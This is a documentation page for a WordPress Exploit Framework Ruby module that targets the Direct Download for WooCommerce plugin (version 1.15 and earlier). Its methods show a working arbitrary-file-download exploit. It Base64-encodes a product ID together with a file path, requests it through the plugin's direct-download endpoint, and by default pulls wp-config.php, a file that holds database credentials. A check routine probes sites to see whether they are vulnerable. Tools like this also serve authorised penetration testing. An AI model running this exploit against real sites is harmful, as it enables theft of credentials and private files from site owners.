class Wpxf::Auxiliary::DirectDownloadForWoocommerceFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'Direct Download for WooCommerce <= 1.15 File Download',
    author: [
      'Diego Celdran Morell', # Disclosure
      'rastating'             # WPXF module
    ],
    references: [
      ['WPVDB', '8724']
    ],
    date: 'Jan 17 2017'
  )

  register_options([
    IntegerOption.new(
      name: 'product_id',
      desc: 'A valid product ID that has direct download enabled',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 30
def check
  url = normalize_uri(full_uri, 'direct-download', Utility::Text.rand_alpha(5))
  res = execute_get_request(url: url)
  return :vulnerable if res && !validate_content(res.body)
  :unknown
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 41
def default_remote_file_path
  'wp-config.php'
end
download_ref() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 49
def download_ref
  Base64.strict_encode64("#{product_id}|#{remote_file}")
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 53
def downloader_url
  normalize_uri(full_uri, 'direct-download', download_ref)
end
product_id() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 37
def product_id
  normalized_option_value('product_id')
end
validate_content(content) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 57
def validate_content(content)
  content !~ /This product is not available for direct free download/
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 45
def working_directory
  'the WordPress installation directory'
end